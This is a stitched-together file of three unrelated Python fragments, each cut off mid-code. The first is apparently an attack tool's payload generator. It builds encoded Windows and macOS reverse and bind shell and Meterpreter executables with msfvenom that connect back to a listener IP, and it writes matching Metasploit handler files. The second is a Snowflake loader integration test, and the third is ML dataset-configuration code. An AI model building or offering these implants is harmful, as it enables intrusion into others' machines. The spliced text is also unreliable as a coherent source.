print(m.bcolors.GREEN + m.bcolors.BOLD + m.bcolors.UNDERLINE + "\tWe are generating the 32bit Meterpreter Payloads NOW!" + m.bcolors.ENDC)
print(m.bcolors.BLUE + "[*]" + m.bcolors.ENDC + " Generating 32bit MSFVenom Files Named:" + filename)
os.system(
"msfvenom -p " + payload + " LHOST=" + m.listener_ip + " LPORT=" + port + " --platform win -a x86 -e x86/shikata_ga_nai -f exe >" + customfolder + filename + ".exe")
print(m.bcolors.BLUE + "[*]" + m.bcolors.ENDC + " Generating MSF Resource File...")
msf_resource_file = open(customfolder + filename + ".rc", "w")
msf_resource_file.write("""use multi/handler
set payload %s
set LHOST %s
set LPORT %s
set ExitOnSession false
exploit -j
""" % (payload, m.listener_ip, port))
## 64 bit MSFVenom MeterpreterShell
def gen_win64():
global customfolder
payload = "null"
port = "null"
filename = "null"
a = "windows/x64/shell/bind_tcp"
b = "windows/x64/shell/reverse_tcp"
c = "windows/x64/shell_bind_tcp"
d = "windows/x64/shell_reverse_tcp"
a1 = "windows/x64/meterpreter/bind_tcp"
b1 = "windows/x64/meterpreter/reverse_http"
c1 = "windows/x64/meterpreter/reverse_https"
d1 = "windows/x64/meterpreter/reverse_tcp"
a2 = "windows/x64/meterpreter_bind_tcp"
b2 = "windows/x64/meterpreter_reverse_http"
c2 = "windows/x64/meterpreter_reverse_https"
d2 = "windows/x64/meterpreter_reverse_tcp"
print(m.bcolors.ERROR + m.bcolors.BOLD + "\tAt any time you can go back to the menu by inputting q or Q" + m.bcolors.ENDC)
print(m.bcolors.GREEN + m.bcolors.BOLD + m.bcolors.UNDERLINE + "\tPayload Options\n\n" + m.bcolors.ENDC)
print(m.bcolors.ERROR + "\t*******************************************************************" + m.bcolors.ENDC)
print("""
Best Payloads to use
(a) ---%s
(b) ---%s
(c) ---%s
(d) ---%s
(a1)---%s
(b1)---%s
(c1)---%s
(d1)---%s
(a2)---%s
(b2)---%s
(c2)---%s
(d2)---%s
""" % (a, b, c, d, a1, b1, c1, d1, a2, b2, c2, d2))
if (payload == "null"):
print(
"Please pick a payload type that meets your needs. Use the letter/number to pick the payload.. Example 'a' for windows/shell/bind_tcp\n")
payload = input("\tEnter payload type: ") or d2
if payload == 'a':
payload = a
elif payload == 'b':
payload = b
elif payload == 'c':
payload = c
elif payload == 'd':
payload = d
elif payload == 'a1':
payload = a1
elif payload == 'b1':
payload = b1
elif payload == 'c1':
payload = c1
elif payload == 'd1':
payload = d1
elif payload == 'a2':
payload = a2
elif payload == 'b2':
payload = b2
elif payload == 'c2':
payload = c2
elif payload == 'd2':
payload = d2
elif payload == 'q' or 'Q':
return
else:
print(m.bcolors.ERROR + m.bcolors.BOLD + m.bcolors.UNDERLINE +"\t********Invalid payload***********" + m.bcolors.ENDC)
print("\tYour Payload is: %s" % (payload))
if (port == "null"):
port = input("\tWhat Port are you wanting to use?:")
if port == 'q':
return
elif port == 'Q':
return
else:
print("\tYour port is: " + port)
if (filename == "null"):
filename = input("\tWhat is the name of your file?:")
if filename == 'q':
return
elif filename == 'Q':
return
else:
print("\tFile name set to: " + filename)
print(m.bcolors.GREEN + m.bcolors.BOLD + m.bcolors.UNDERLINE + "\tWe are generating the 64bit Meterpreter Payloads NOW!" + m.bcolors.ENDC)
print(m.bcolors.BLUE + "[*]" + m.bcolors.ENDC + " Generating 64bit MSFVenom Files Named:" + filename)
os.system(
"msfvenom -p " + payload + " LHOST=" + m.listener_ip + " LPORT=" + port + " --platform win -a x64 -e x64/xor -i 3 -f exe >" + customfolder + filename +".exe")
print(m.bcolors.BLUE + "[*]" + m.bcolors.ENDC + " Generating MSF Resource File...")
msf_resource_file = open(customfolder + filename + ".rc", "w")
msf_resource_file.write("""use multi/handler
set payload %s
set LHOST %s
set LPORT %s
set ExitOnSession false
exploit -j
""" % (payload, m.listener_ip, port))
## 32 bit MAC MSFVenom MeterpreterShell
def gen_mac32():
global customfolder
payload = "null"
port = "null"
filename = "null"
a = "osx/x86/shell_bind_tcp"
b = "osx/x86/shell_reverse_tcp"
c = "osx/x86/vforkshell/bind_tcp"
d = "osx/x86/vforkshell/reverse_tcp"
e = "osx/x86/vforkshell_bind_tcp"
f = "osx/x86/vforkshell_reverse_tcp"
print(m.bcolors.ERROR + m.bcolors.BOLD + "\tAt any time you can go back to the menu by inputting q or Q" + m.bcolors.ENDC)
print(m.bcolors.GREEN + m.bcolors.BOLD + m.bcolors.UNDERLINE + "\tPayload Options\n\n" + m.bcolors.ENDC)
print(m.bcolors.ERROR + "\t*******************************************************************" + m.bcolors.ENDC)
print("""
Best Payloads to use
(a) ---%s
(b) ---%s
(c) ---%s
(d) ---%s
(e) ---%s
(f) ---%s
""" % (a, b, c, d, e, f))
if (payload == "null"):
print(
"Please pick a payload type that meets your needs. Use the letter/number to pick the payload.. Example 'a' for windows/shell/bind_tcp\n")
payload = input("\tEnter payload type: ") or | |
<filename>tests/integration/test_target_snowflake.py
import datetime
import gzip
import json
import tempfile
import unittest
import mock
import os
import botocore
import boto3
import itertools
import target_snowflake
from target_snowflake import RecordValidationException
from target_snowflake.db_sync import DbSync
from target_snowflake.upload_clients.s3_upload_client import S3UploadClient
from pyarrow.lib import ArrowTypeError
from snowflake.connector.errors import ProgrammingError
from snowflake.connector.errors import DatabaseError
try:
import tests.integration.utils as test_utils
except ImportError:
import utils as test_utils
METADATA_COLUMNS = [
'_SDC_EXTRACTED_AT',
'_SDC_BATCHED_AT',
'_SDC_DELETED_AT'
]
class TestIntegration(unittest.TestCase):
"""
Integration Tests
"""
maxDiff = None
def setUp(self):
self.config = test_utils.get_test_config()
snowflake = DbSync(self.config)
# Drop target schema
if self.config['default_target_schema']:
snowflake.query("DROP SCHEMA IF EXISTS {}".format(self.config['default_target_schema']))
# Set up S3 client
aws_access_key_id = self.config.get('aws_access_key_id')
aws_secret_access_key = self.config.get('aws_secret_access_key')
aws_session_token = self.config.get('aws_session_token')
aws_session = boto3.session.Session(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
aws_session_token=aws_session_token
)
self.s3_client = aws_session.client('s3',
region_name=self.config.get('s3_region_name'),
endpoint_url=self.config.get('s3_endpoint_url'))
def persist_lines(self, lines):
"""Loads singer messages into snowflake without table caching option"""
target_snowflake.persist_lines(self.config, lines)
def persist_lines_with_cache(self, lines):
"""Enables table caching option and loads singer messages into snowflake.
Table caching mechanism is creating and maintaining an extra table in snowflake about
the table structures. It's very similar to the INFORMATION_SCHEMA.COLUMNS system views
but querying INFORMATION_SCHEMA is slow especially when lot of taps running
in parallel.
Selecting from a real table instead of INFORMATION_SCHEMA and keeping it
in memory while the target-snowflake is running results better load performance.
"""
table_cache, file_format_type = target_snowflake.get_snowflake_statics(self.config)
target_snowflake.persist_lines(self.config, lines, table_cache, file_format_type)
def remove_metadata_columns_from_rows(self, rows):
"""Removes metadata columns from a list of rows"""
d_rows = []
for r in rows:
# Copy the original row to a new dict to keep the original dict
# and remove metadata columns
d_row = r.copy()
for md_c in METADATA_COLUMNS:
d_row.pop(md_c, None)
# Add new row without metadata columns to the new list
d_rows.append(d_row)
return d_rows
def assert_metadata_columns_exist(self, rows):
"""This is a helper assertion that checks if every row in a list has metadata columns"""
for r in rows:
for md_c in METADATA_COLUMNS:
self.assertTrue(md_c in r)
def assert_metadata_columns_not_exist(self, rows):
"""This is a helper assertion that checks metadata columns don't exist in any row"""
for r in rows:
for md_c in METADATA_COLUMNS:
self.assertFalse(md_c in r)
def assert_three_streams_are_into_snowflake(self, should_metadata_columns_exist=False,
should_hard_deleted_rows=False):
"""
This is a helper assertion that checks if every data from the message-with-three-streams.json
file is available in Snowflake tables correctly.
Useful to check different loading methods (unencrypted, Client-Side encryption, gzip, etc.)
without duplicating assertions
"""
snowflake = DbSync(self.config)
default_target_schema = self.config.get('default_target_schema', '')
schema_mapping = self.config.get('schema_mapping', {})
# Identify target schema name
target_schema = None
if default_target_schema is not None and default_target_schema.strip():
target_schema = default_target_schema
elif schema_mapping:
target_schema = "tap_mysql_test"
# Get loaded rows from tables
table_one = snowflake.query("SELECT * FROM {}.test_table_one ORDER BY c_pk".format(target_schema))
table_two = snowflake.query("SELECT * FROM {}.test_table_two ORDER BY c_pk".format(target_schema))
table_three = snowflake.query("SELECT * FROM {}.test_table_three ORDER BY c_pk".format(target_schema))
# ----------------------------------------------------------------------
# Check rows in table_one
# ----------------------------------------------------------------------
expected_table_one = [
{'C_INT': 1, 'C_PK': 1, 'C_VARCHAR': '1'}
]
self.assertEqual(
self.remove_metadata_columns_from_rows(table_one), expected_table_one)
# ----------------------------------------------------------------------
# Check rows in table_tow
# ----------------------------------------------------------------------
expected_table_two = []
if not should_hard_deleted_rows:
expected_table_two = [
{'C_INT': 1, 'C_PK': 1, 'C_VARCHAR': '1', 'C_DATE': datetime.datetime(2019, 2, 1, 15, 12, 45)},
{'C_INT': 2, 'C_PK': 2, 'C_VARCHAR': '2', 'C_DATE': datetime.datetime(2019, 2, 10, 2, 0, 0)}
]
else:
expected_table_two = [
{'C_INT': 2, 'C_PK': 2, 'C_VARCHAR': '2', 'C_DATE': datetime.datetime(2019, 2, 10, 2, 0, 0)}
]
self.assertEqual(
self.remove_metadata_columns_from_rows(table_two), expected_table_two)
# ----------------------------------------------------------------------
# Check rows in table_three
# ----------------------------------------------------------------------
expected_table_three = []
if not should_hard_deleted_rows:
expected_table_three = [
{'C_INT': 1, 'C_PK': 1, 'C_VARCHAR': '1', 'C_TIME': datetime.time(4, 0, 0)},
{'C_INT': 2, 'C_PK': 2, 'C_VARCHAR': '2', 'C_TIME': datetime.time(7, 15, 0)},
{'C_INT': 3, 'C_PK': 3, 'C_VARCHAR': '3', 'C_TIME': datetime.time(23, 0, 3)}
]
else:
expected_table_three = [
{'C_INT': 1, 'C_PK': 1, 'C_VARCHAR': '1', 'C_TIME': datetime.time(4, 0, 0)},
{'C_INT': 2, 'C_PK': 2, 'C_VARCHAR': '2', 'C_TIME': datetime.time(7, 15, 0)}
]
self.assertEqual(
self.remove_metadata_columns_from_rows(table_three), expected_table_three)
# ----------------------------------------------------------------------
# Check if metadata columns exist or not
# ----------------------------------------------------------------------
if should_metadata_columns_exist:
self.assert_metadata_columns_exist(table_one)
self.assert_metadata_columns_exist(table_two)
self.assert_metadata_columns_exist(table_three)
else:
self.assert_metadata_columns_not_exist(table_one)
self.assert_metadata_columns_not_exist(table_two)
self.assert_metadata_columns_not_exist(table_three)
def assert_logical_streams_are_in_snowflake(self, should_metadata_columns_exist=False):
# Get loaded rows from tables
snowflake = DbSync(self.config)
target_schema = self.config.get('default_target_schema', '')
table_one = snowflake.query("SELECT * FROM {}.logical1_table1 ORDER BY CID".format(target_schema))
table_two = snowflake.query("SELECT * FROM {}.logical1_table2 ORDER BY CID".format(target_schema))
table_three = snowflake.query("SELECT * FROM {}.logical2_table1 ORDER BY CID".format(target_schema))
table_four = snowflake.query("SELECT CID, CTIMENTZ, CTIMETZ FROM {}.logical1_edgydata WHERE CID IN(1,2,3,4,5,6,8,9) ORDER BY CID".format(target_schema))
# ----------------------------------------------------------------------
# Check rows in table_one
# ----------------------------------------------------------------------
expected_table_one = [
{'CID': 1, 'CVARCHAR': "inserted row", 'CVARCHAR2': None},
{'CID': 2, 'CVARCHAR': 'inserted row', "CVARCHAR2": "inserted row"},
{'CID': 3, 'CVARCHAR': "inserted row", 'CVARCHAR2': "inserted row"},
{'CID': 4, 'CVARCHAR': "inserted row", 'CVARCHAR2': "inserted row"}
]
# ----------------------------------------------------------------------
# Check rows in table_tow
# ----------------------------------------------------------------------
expected_table_two = [
{'CID': 1, 'CVARCHAR': "updated row"},
{'CID': 2, 'CVARCHAR': 'updated row'},
{'CID': 3, 'CVARCHAR': "updated row"},
{'CID': 5, 'CVARCHAR': "updated row"},
{'CID': 7, 'CVARCHAR': "updated row"},
{'CID': 8, 'CVARCHAR': 'updated row'},
{'CID': 9, 'CVARCHAR': "updated row"},
{'CID': 10, 'CVARCHAR': 'updated row'}
]
# ----------------------------------------------------------------------
# Check rows in table_three
# ----------------------------------------------------------------------
expected_table_three = [
{'CID': 1, 'CVARCHAR': "updated row"},
{'CID': 2, 'CVARCHAR': 'updated row'},
{'CID': 3, 'CVARCHAR': "updated row"},
]
# ----------------------------------------------------------------------
# Check rows in table_four
# ----------------------------------------------------------------------
expected_table_four = [
{'CID': 1, 'CTIMENTZ': None, 'CTIMETZ': None},
{'CID': 2, 'CTIMENTZ': datetime.time(23, 0, 15), 'CTIMETZ': datetime.time(23, 0, 15)},
{'CID': 3, 'CTIMENTZ': datetime.time(12, 0, 15), 'CTIMETZ': datetime.time(12, 0, 15)},
{'CID': 4, 'CTIMENTZ': datetime.time(12, 0, 15), 'CTIMETZ': datetime.time(9, 0, 15)},
{'CID': 5, 'CTIMENTZ': datetime.time(12, 0, 15), 'CTIMETZ': datetime.time(15, 0, 15)},
{'CID': 6, 'CTIMENTZ': datetime.time(0, 0), 'CTIMETZ': datetime.time(0, 0)},
{'CID': 8, 'CTIMENTZ': datetime.time(0, 0), 'CTIMETZ': datetime.time(1, 0)},
{'CID': 9, 'CTIMENTZ': datetime.time(0, 0), 'CTIMETZ': datetime.time(0, 0)}
]
if should_metadata_columns_exist:
self.assertEqual(self.remove_metadata_columns_from_rows(table_one), expected_table_one)
self.assertEqual(self.remove_metadata_columns_from_rows(table_two), expected_table_two)
self.assertEqual(self.remove_metadata_columns_from_rows(table_three), expected_table_three)
self.assertEqual(table_four, expected_table_four)
else:
self.assertEqual(table_one, expected_table_one)
self.assertEqual(table_two, expected_table_two)
self.assertEqual(table_three, expected_table_three)
self.assertEqual(table_four, expected_table_four)
def assert_logical_streams_are_in_snowflake_and_are_empty(self):
# Get loaded rows from tables
snowflake = DbSync(self.config)
target_schema = self.config.get('default_target_schema', '')
table_one = snowflake.query("SELECT * FROM {}.logical1_table1 ORDER BY CID".format(target_schema))
table_two = snowflake.query("SELECT * FROM {}.logical1_table2 ORDER BY CID".format(target_schema))
table_three = snowflake.query("SELECT * FROM {}.logical2_table1 ORDER BY CID".format(target_schema))
table_four = snowflake.query("SELECT CID, CTIMENTZ, CTIMETZ FROM {}.logical1_edgydata WHERE CID IN(1,2,3,4,5,6,8,9) ORDER BY CID".format(target_schema))
self.assertEqual(table_one, [])
self.assertEqual(table_two, [])
self.assertEqual(table_three, [])
self.assertEqual(table_four, [])
def assert_binary_data_are_in_snowflake(self, table_name, should_metadata_columns_exist=False):
# Get loaded rows from tables
snowflake = DbSync(self.config)
target_schema = self.config.get('default_target_schema', '')
table_one = snowflake.query("SELECT * FROM {}.{} ORDER BY ID".format(target_schema, table_name))
# ----------------------------------------------------------------------
# Check rows in table_one
# ----------------------------------------------------------------------
expected_table_one = [
{'ID': b'pk2', 'DATA': b'data2', 'CREATED_AT': datetime.datetime(2019, 12, 17, 16, 2, 55)},
{'ID': b'pk4', 'DATA': b'data4', "CREATED_AT": datetime.datetime(2019, 12, 17, 16, 32, 22)},
]
if should_metadata_columns_exist:
self.assertEqual(self.remove_metadata_columns_from_rows(table_one), expected_table_one)
else:
self.assertEqual(table_one, expected_table_one)
#################################
# TESTS #
#################################
def test_invalid_json(self):
"""Receiving invalid JSONs should raise an exception"""
tap_lines = test_utils.get_test_tap_lines('invalid-json.json')
with self.assertRaises(json.decoder.JSONDecodeError):
self.persist_lines_with_cache(tap_lines)
def test_message_order(self):
"""RECORD message without a previously received SCHEMA message should raise an exception"""
tap_lines = test_utils.get_test_tap_lines('invalid-message-order.json')
with self.assertRaises(Exception):
self.persist_lines_with_cache(tap_lines)
def test_run_query(self):
"""Running SQLs"""
snowflake = DbSync(self.config)
# Running single SQL should return as array
self.assertEqual(snowflake.query("SELECT 1 col1, 2 col2"),
[{'COL1': 1, 'COL2': 2}])
# Running multiple SQLs should return the result of the last query
self.assertEqual(snowflake.query(["SELECT 1 col1, 2 col2",
"SELECT 3 col1, 4 col2",
"SELECT 5 col1, 6 col2"]),
[{'COL1': 5, 'COL2': 6}])
# Running multiple SQLs should return empty list if the last query returns zero record
self.assertEqual(snowflake.query(["SELECT 1 col1, 2 col2",
"SELECT 3 col1, 4 col2",
"SELECT 5 col1, 6 col2 WHERE 1 = 2"]),
[])
# Running multiple SQLs should return the result of the last query even if a previous query returns zero record
self.assertEqual(snowflake.query(["SELECT 1 col1, 2 col2 WHERE 1 =2 ",
"SELECT 3 col1, 4 col2",
"SELECT 5 col1, 6 col2"]),
[{'COL1': 5, 'COL2': 6}])
# Running multiple SQLs should return empty list if every query returns zero record
self.assertEqual(snowflake.query(["SELECT 1 col1, 2 col2 WHERE 1 = 2 ",
"SELECT 3 col1, 4 col2 WHERE 1 = 2",
"SELECT 5 col1, 6 col2 WHERE 1 = 2"]),
[])
def test_loading_tables_with_no_encryption(self):
"""Loading multiple tables from the same input tap with various columns types"""
tap_lines = test_utils.get_test_tap_lines('messages-with-three-streams.json')
# Turning off client-side encryption and load
self.config['client_side_encryption_master_key'] = ''
self.persist_lines_with_cache(tap_lines)
self.assert_three_streams_are_into_snowflake()
def test_loading_tables_with_client_side_encryption(self):
"""Loading multiple tables from the same input tap with various columns types"""
tap_lines | |
holding the dataset files
filename = os.path.basename(str(filename))
# see the param_grid at the bottom of this file for examples
metadata_grid[filename] = {
'dataset': dataset,
'X': X,
'y': y,
'y_train': y_train,
'y_test': y_test,
'X_train': X_train,
'X_test': X_test,
'header': head,
'X_header': X_header,
'y_header': y_header,
'decoder': decode,
'scaler': scaler,
'estimator_scoring': value['estimator_scoring'],
'learning_curve_scoring': value['learning_curve_scoring'],
'plots': value['plots'] if 'plots' in value else [],
'best_estimator': value['best_estimator']
}
dataset_count += 1
return metadata_grid
def metadata_to_xy_trn_tst(param_grid, *filenames):
"""
handle datasets with separate train and test files (adult.data, adult.test)
Future iterations of the code will aim at the dividing the roles of files_to_metadata() and metadata_to_xy_trn_tst()
since the former function already transforms the data to xy_trn_tst
:param param_grid: Dictionary with dataset names (str) as keys corresponding to the name of directory that contains
the filename(s). and dictionaries of parameter settings to read and edit the corresponding dataset as values. The
param setting are: filename(s) (list) including the file extension, header (str): None if header is within dataset,
delimiter (str), y (list): name of y column(s), skip_columns (int), train_size (float), split_random_state (int),
and 'included_test_train' (bool): True if the provided files are test and train datasets.
:param filenames: name of file(s), at most two, that contains the dataset. If >1, Files must be a train and test
datasets respectively
:return X_train, X_test, y_train, y_test, X_header, y_header, decoder, scaler object, scoring metrics, types of
plots, and extra model_params of the dataset
"""
Data_abspath = os.path.join(ROOT_DIR, 'Data')
dataset_dirname = None
# walk the directories to find the data file
for root, dirs, files in os.walk(Data_abspath):
for file in files:
if file == filenames[0]:
# save the directory name that contains the data file
dataset_dirname = os.path.basename(root)
# find the value that stores the model parameters corresponding the dataset in-hand
model_params = globals()['{}_params'.format(dataset_dirname)]
# create a dictionary with one value to ingest it to the function files_to_metadata()
import_param = {dataset_dirname: param_grid[dataset_dirname]}
METADATA_S = files_to_metadata(import_param)
# handle train and test separate files
metadata = METADATA_S[filenames[0]]
header, X_header, y_header, scaler, estimator_scoring, learning_curve_scoring, plots, best_estimator = \
metadata['header'], metadata['X_header'], metadata['y_header'], metadata['scaler'], \
metadata['estimator_scoring'], metadata['learning_curve_scoring'], metadata['plots'], metadata['best_estimator']
# no separate train and test
if len(filenames) == 1:
metadata = METADATA_S[filenames[0]]
dataset = metadata['dataset']
X = metadata['X']
y = metadata['y']
y_train = metadata['y_train']
y_test = metadata['y_test']
X_train = metadata['X_train']
X_test = metadata['X_test']
decoder = metadata['decoder']
else:
# train dataset as np array
train_metadata = METADATA_S[filenames[0]]
# test dataset as np array
test_metadata = METADATA_S[filenames[1]]
X_train, X_test = train_metadata['X'], test_metadata['X']
y_train, y_test = train_metadata['y'], test_metadata['y']
# not used for modelling, used for debugging
# can be scaled to handle splits with different train and test sizes
X = np.concatenate((X_train, X_test), axis=0)
y = np.concatenate((y_train, y_test), axis=None)
# scaled and fitted on train data
X_train = scaler.fit_transform(X_train)
X_test = scaler.transform(X_test)
dataset = np.append(X, y.reshape((-1, 1)), axis=1)
# decoder is 2d. can't use it as label for confusionMatrix
decoder = [train_metadata['decoder'], test_metadata['decoder']]
output = {
'dataset': dataset,
'X': X,
'y': y,
'y_train': y_train,
'y_test': y_test,
'X_train': X_train,
'X_test': X_test,
'header': header,
'X_header': X_header,
'y_header': y_header,
'decoder': decoder,
'scaler': scaler,
'estimator_scoring': estimator_scoring,
'learning_curve_scoring': learning_curve_scoring,
'model_params': model_params,
'dataset_dirname': dataset_dirname,
'plots': plots,
'best_estimator': best_estimator
}
return output
read_files_param_grid = {
'diabetic_retinopathy': {
'filenames': ['messidor_features.arff'],
'header': 'columns',
'delimiter': ',',
'y': ['class label'],
'skip_columns': [],
'skip_rows': [24],
'train_size': 0.75,
'split_random_state': 0,
'stratify': True,
'included_test_train': False,
'estimator_scoring': [accuracy_score, precision_score],
'learning_curve_scoring': [[log_loss]],
'positive_label': [1],
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.svm.SVC(C=1, kernel='poly', gamma='scale', coef0=30, random_state=0)
},
'credit_default': {
'filenames': ['default of credit card clients.xls'],
'header': None,
'delimiter': None,
'y': ['default payment next month'],
'skip_columns': ['ID'],
'skip_rows': [1],
'train_size': 0.75,
'split_random_state': 0,
'stratify': True,
'included_test_train': False,
'estimator_scoring': [accuracy_score, precision_score],
'learning_curve_scoring': [[log_loss]],
'positive_label': [1],
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.ensemble.AdaBoostClassifier(algorithm='SAMME', n_estimators=50, learning_rate=0.1,
random_state=0)
},
'breast_cancer': {
'filenames': ['breast-cancer-wisconsin.data'],
'header': 'columns',
'delimiter': ',',
'y': ['Class'],
'skip_columns': ['Sample code number'],
'skip_rows': [0],
'train_size': 0.75,
'split_random_state': 0,
'stratify': True,
'included_test_train': False,
'estimator_scoring': [accuracy_score, precision_score],
'learning_curve_scoring': [[log_loss]],
'positive_label': [4],
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.linear_model.LogisticRegression(fit_intercept=True, penalty='none', C=1.0,
random_state=0, max_iter=10000)
},
'german_credit': {
'filenames': ['german.data-numeric'],
'header': 'columns.data-numeric',
'delimiter': ' ',
'y': ['target'],
'skip_columns': [],
'skip_rows': [0],
'train_size': 0.75,
'split_random_state': 0,
'stratify': True,
'included_test_train': False,
'estimator_scoring': [accuracy_score, recall_score, average_precision_score, roc_auc_score],
'learning_curve_scoring': [[log_loss]],
'positive_label': [2],
'plots': ['best_estimator_vs_parameters', 'learning_curve', 'ROC_curve', 'PR_curve'],
'best_estimator': sklearn.linear_model.LogisticRegression(fit_intercept=True, penalty='none', C=10,
random_state=0, solver='sag',
class_weight={0: 1., 1: 5.})
},
'adult': {
'filenames': ['adult.data', 'adult.test'], # start with the train file because train_standard_scaler is used
'header': 'columns',
'delimiter': ',',
'y': ['yearly salary'],
'skip_columns': [],
'skip_rows': [0, 1],
'train_size': None,
'split_random_state': 0,
'stratify': True,
'included_test_train': True,
'estimator_scoring': [accuracy_score, precision_score],
'learning_curve_scoring': [[log_loss]],
'positive_label': ['>50K', '>50K.'],
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.ensemble.RandomForestClassifier(max_depth=9, n_estimators=100, criterion='gini',
random_state=0)
},
# multiclass
'yeast': {
'filenames': ['yeast.data'],
'header': 'columns',
'delimiter': ' ',
'y': ['location'],
'skip_columns': ['Sequence Name'],
'skip_rows': [0],
'train_size': 0.75,
'split_random_state': 0,
'stratify': True,
'included_test_train': False,
'estimator_scoring': [accuracy_score, f1_score],
'learning_curve_scoring': [[accuracy_score]],
'positive_label': None,
'plots': ['best_estimator_vs_parameters', 'confusion_matrix'],
'best_estimator': sklearn.ensemble.RandomForestClassifier(max_depth=12, n_estimators=100, criterion='entropy',
max_features='auto', random_state=0)
},
'thoracic_surgery': {
'filenames': ['ThoraricSurgery.arff'],
'header': 'columns',
'delimiter': ',',
'y': ['Risk1Yr'],
'skip_columns': [],
'skip_rows': [21],
'train_size': 0.75,
'split_random_state': 0,
'stratify': True,
'included_test_train': False,
'estimator_scoring': [accuracy_score, precision_score],
'learning_curve_scoring': [[log_loss]],
'positive_label': ['T'],
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.svm.SVC(C=0.5, kernel='poly', max_iter=100, random_state=0)
},
'seismic_bumps': {
'filenames': ['seismic-bumps.arff'],
'header': 'columns',
'delimiter': ',',
'y': ['class'],
'skip_columns': [],
'skip_rows': [154],
'train_size': 0.75,
'split_random_state': 0,
'stratify': True,
'included_test_train': False,
'estimator_scoring': [accuracy_score, precision_score],
'learning_curve_scoring': [[log_loss]],
'positive_label': [1],
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.ensemble.AdaBoostClassifier(algorithm='SAMME.R', n_estimators=200, learning_rate=0.1,
random_state=0)
},
'wine_quality_white': {
'filenames': ['winequality-white.csv'],
'header': None,
'delimiter': ';',
'y': ['quality'],
'skip_columns': [],
'skip_rows': [0],
'train_size': 0.75,
'split_random_state': 0,
'stratify': False,
'included_test_train': False,
'estimator_scoring': [mean_absolute_error, explained_variance_score, r2_score, mean_squared_error],
'learning_curve_scoring': [[mean_squared_error]],
'positive_label': None,
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.ensemble.RandomForestRegressor(criterion='squared_error', max_depth=50,
n_estimators=200, max_features='auto', random_state=0)
},
'wine_quality_red': {
'filenames': ['winequality-red.csv'],
'header': None,
'delimiter': ';',
'y': ['quality'],
'skip_columns': [],
'skip_rows': [0],
'train_size': 0.75,
'stratify': False,
'split_random_state': 0,
'included_test_train': False,
'estimator_scoring': [mean_absolute_error, explained_variance_score, r2_score, mean_squared_error],
'learning_curve_scoring': [[mean_squared_error]],
'positive_label': None,
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.neural_network.MLPRegressor(hidden_layer_sizes=50, max_iter=100, random_state=0)
},
'crime_predict': {
'filenames': ['communities.data'],
'header': 'communities.names',
'delimiter': ',',
'y': ['ViolentCrimesPerPop numeric'],
'skip_columns': ['state numeric', 'county numeric', 'community numeric', 'communityname string',
'fold numeric'],
'skip_rows': [0],
'train_size': 0.75,
'stratify': False,
'split_random_state': 0,
'included_test_train': False,
'estimator_scoring': [mean_absolute_error, explained_variance_score, r2_score, mean_squared_error],
'learning_curve_scoring': [[mean_squared_error]],
'positive_label': None,
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.ensemble.RandomForestRegressor(criterion='squared_error', max_depth=50,
n_estimators=200, max_features='auto', random_state=0)
},
'aquatic_toxicity': {
'filenames': ['qsar_aquatic_toxicity.csv'],
'header': 'columns.csv',
'delimiter': ';',
'y': ['quantitative response'],
'skip_columns': [],
'skip_rows': [0],
'train_size': 0.75,
'stratify': False,
'split_random_state': 0,
'included_test_train': False,
'estimator_scoring': [mean_absolute_error, explained_variance_score, r2_score, mean_squared_error],
'learning_curve_scoring': [[mean_squared_error]],
'positive_label': None,
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.svm.SVR(C=10, gamma='auto', kernel='rbf')
},
'facebook_metrics': {
'filenames': ['dataset_Facebook.csv'],
'header': None,
'delimiter': ';',
'y': ['Total Interactions'],
'skip_columns': ['Lifetime Post Total Reach', 'Lifetime Post Total Impressions', 'Lifetime Engaged Users',
'Lifetime Post Consumers', 'Lifetime Post Consumptions',
'Lifetime Post Impressions by people who have liked your Page',
'Lifetime Post reach by people who like your Page',
'Lifetime People who have liked your Page and engaged with your post', 'comment', 'like',
'share'],
'skip_rows': [0],
'train_size': 0.75,
'stratify': False,
'split_random_state': 0,
'included_test_train': False,
'estimator_scoring': [mean_absolute_error, explained_variance_score, r2_score, mean_squared_error],
'learning_curve_scoring': [[mean_squared_error]],
'positive_label': None,
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.ensemble.RandomForestRegressor(criterion='squared_error', max_depth=50,
n_estimators=100, max_features='auto', random_state=0)
},
'bike_sharing': {
'filenames': ['hour.csv'],
'header': None,
'delimiter': ',',
'y': ['cnt'],
'skip_columns': ['instant'],
'skip_rows': [0],
'train_size': 0.75,
'stratify': False,
'split_random_state': 0,
'included_test_train': False,
'estimator_scoring': [mean_absolute_error, explained_variance_score, r2_score, mean_squared_error],
'learning_curve_scoring': [[mean_squared_error]],
'positive_label': None,
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.tree.DecisionTreeRegressor(criterion='squared_error', max_depth=100, random_state=0,
splitter='random', min_impurity_decrease=0.9)
},
'student_performance_mat': {
'filenames': ['student-mat.csv'],
'header': None,
'delimiter': ';',
'y': ['G1', 'G2', 'G3'],
'skip_columns': [],
'skip_rows': [0],
'train_size': 0.75,
'stratify': False,
'split_random_state': 0,
'included_test_train': False,
'estimator_scoring': [mean_absolute_error, explained_variance_score, r2_score, mean_squared_error],
'learning_curve_scoring': [[mean_squared_error]],
'positive_label': None,
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.tree.DecisionTreeRegressor(criterion='poisson', max_depth=100, random_state=0,
splitter='best', min_impurity_decrease=0.0)
},
'student_performance_por': {
'filenames': ['student-por.csv'],
'header': None,
'delimiter': ';',
'y': ['G1', 'G2', 'G3'],
'skip_columns': [],
'skip_rows': [0],
'train_size': 0.75,
'stratify': False,
'split_random_state': 0,
'included_test_train': False,
'estimator_scoring': [mean_absolute_error, explained_variance_score, r2_score, mean_squared_error],
'learning_curve_scoring': [[mean_squared_error]],
